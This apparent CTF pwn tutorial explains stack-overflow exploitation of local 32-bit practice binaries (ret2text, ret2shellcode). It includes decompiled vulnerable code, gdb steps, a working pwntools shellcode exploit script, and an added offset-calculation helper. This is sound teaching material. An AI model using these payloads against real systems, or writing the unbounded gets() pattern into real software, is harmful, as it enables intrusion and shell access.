PWN Introduction (2) stack overflow Foundation
2022-06-30 05:07:00 【Day-3】
1 C language function call stack

Function stack structure under 32-bit (figure).

Operation process (figure).
2 ret2text

Buffer overflow: in essence, writing more data than a fixed-length buffer can hold, so that the excess overwrites adjacent, otherwise legitimate memory.
- Stack overflow: the most common binary vulnerability, the largest share of vulnerabilities and the most harmful; in CTF PWN it is often the basis of exploitation.
- Heap overflow: the heap manager is complex and many exploitation patterns exist; a common question type in CTF PWN.
- Data segment overflow: the attack effect depends on what control data is stored in the data segment.
ret2text means tampering with the return address in the stack frame so that it points to a backdoor function already present in the program.


First, we have a binary in hand called ret2text.

Load it into IDA to get the decompiled code; three functions are relevant.
int __cdecl main(int argc, const char **argv, const char **envp)
{
    setbuf(stdin, 0);
    setbuf(stdout, 0);
    puts("Have you heard of buffer overflow?");
    vulnerable();
    puts("It seems that you know nothing about it ......");
    return 0;
}

int vulnerable()
{
    char buffer[8]; // [esp+8h] [ebp-10h] BYREF
    gets(buffer);   // unbounded read into an 8-byte stack buffer
    return 0;
}

int get_shell()
{
    system("/bin/sh");
    return 0;
}
We open gdb and start debugging.
Press n to step over instructions until you reach the vulnerable function.
Press s to step into the function.
View the stack.
Determine the payload that needs to be entered.
Use Python to carry out the attack and finally get a shell.
You can also write a script; the logic is the same.
3 ret2shellcode


pwntools can generate the shellcode. 32-bit:
asm(shellcraft.sh())
64-bit (shellcraft.amd64.sh() returns assembly text, so it still has to be assembled):
context.arch = "amd64"
asm(shellcraft.amd64.sh())
We load ret2shellcode into IDA.
char buf2[100]; // global buffer in .bss; size inferred from the 0x64-byte copy below

int __cdecl main(int argc, const char **argv, const char **envp)
{
    char s[100]; // [esp+1Ch] [ebp-64h] BYREF
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stdin, 0, 1, 0);
    puts("No system for you this time !!!");
    gets(s);                    // unbounded read into the 100-byte stack buffer
    strncpy(buf2, s, 0x64u);    // first 100 bytes of the input are copied into the global buf2
    printf("bye bye ~");
    return 0;
}
Assume the server has ASLR protection enabled.
Start gdb for dynamic debugging.

The dynamic debugging result differs from IDA's; we go by the dynamic debugging result.
Write a script:
from pwn import *
sh = process("./ret2shellcode")
shellcode = asm(shellcraft.sh())   # 32-bit /bin/sh shellcode
buf2_addr = 0x804a080               # address of the global buf2, which receives a copy of the input via strncpy
# pad up to the saved return address (offset 112, taken from gdb rather than IDA's ebp-0x64), then point it at buf2
sh.sendline(shellcode.ljust(112, b'A') + p32(buf2_addr))
sh.interactive()

The attack succeeds.
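As an added example (not code from the original post), the following works out, from the IDA annotations shown above for both binaries, the 32-bit frame arithmetic that fixes the padding in both payloads: the distance from a local buffer to the saved return address, and why the static estimate for ret2shellcode (104) is replaced by the 112 observed in gdb, as the text says. The regex and function names are mine; nothing here needs pwntools.

```python
import re
import struct

# IDA annotates stack locals like:  char buffer[8]; // [esp+8h] [ebp-10h] BYREF
IDA_LOCAL = re.compile(
    r"(?P<ctype>\w+)\s+(?P<name>\w+)\[(?P<size>\d+)\];\s*//.*\[ebp-(?P<off>[0-9A-Fa-f]+)h\]"
)

# Padding the page found by stepping through ret2shellcode in gdb (not derivable from IDA alone).
GDB_VERIFIED_RET2SHELLCODE = 112

def parse_ida_local(line):
    """Return (name, size, offset below ebp) from one IDA stack-variable line."""
    m = IDA_LOCAL.search(line)
    if m is None:
        raise ValueError("not an IDA stack-variable line: %r" % line)
    return m.group("name"), int(m.group("size")), int(m.group("off"), 16)

def frame_layout(ebp_offset, size, ptr=4):
    """32-bit frame, addresses increasing to the right: [buffer ... | saved ebp | return address].
    A buffer at ebp-off starts off bytes below the saved ebp; the return address sits one
    pointer above the saved ebp. All offsets are measured from the start of the buffer."""
    return {
        "saved_ebp": ebp_offset,
        "ret_addr": ebp_offset + ptr,
        "overflow_needed": ebp_offset + ptr - size,  # bytes past the buffer end that gets() must write
    }

def static_estimate(line):
    """Offset from buffer start to the return address, as IDA's annotation implies."""
    _, size, off = parse_ida_local(line)
    return frame_layout(off, size)["ret_addr"]

def p32(value):
    """Little-endian 32-bit pack, equivalent to pwntools' p32."""
    return struct.pack("<I", value)

def build_overwrite(padding_len, new_ret, filler=b"A"):
    """Filler up to the return address followed by its replacement: the shape of the
    page's ljust(...) + p32(...) payload."""
    return filler * padding_len + p32(new_ret)

if __name__ == "__main__":
    ret2text = "char buffer[8]; // [esp+8h] [ebp-10h] BYREF"    # from the page's IDA output
    ret2shellcode = "char s[100]; // [esp+1Ch] [ebp-64h] BYREF"  # from the page's IDA output
    name, size, off = parse_ida_local(ret2text)
    print(name, frame_layout(off, size))  # ret_addr 20: 8 bytes fit, 12 more reach the return address
    est = static_estimate(ret2shellcode)
    print("ret2shellcode: IDA implies", est, "but gdb shows", GDB_VERIFIED_RET2SHELLCODE)  # 104 vs 112
    print(build_overwrite(GDB_VERIFIED_RET2SHELLCODE, 0x804a080).hex())
```

The IDA-derived figure is only a starting estimate: as the post notes for ret2shellcode, the frame base IDA assumes can differ from the real one, so the offset is confirmed in gdb before it goes into a payload.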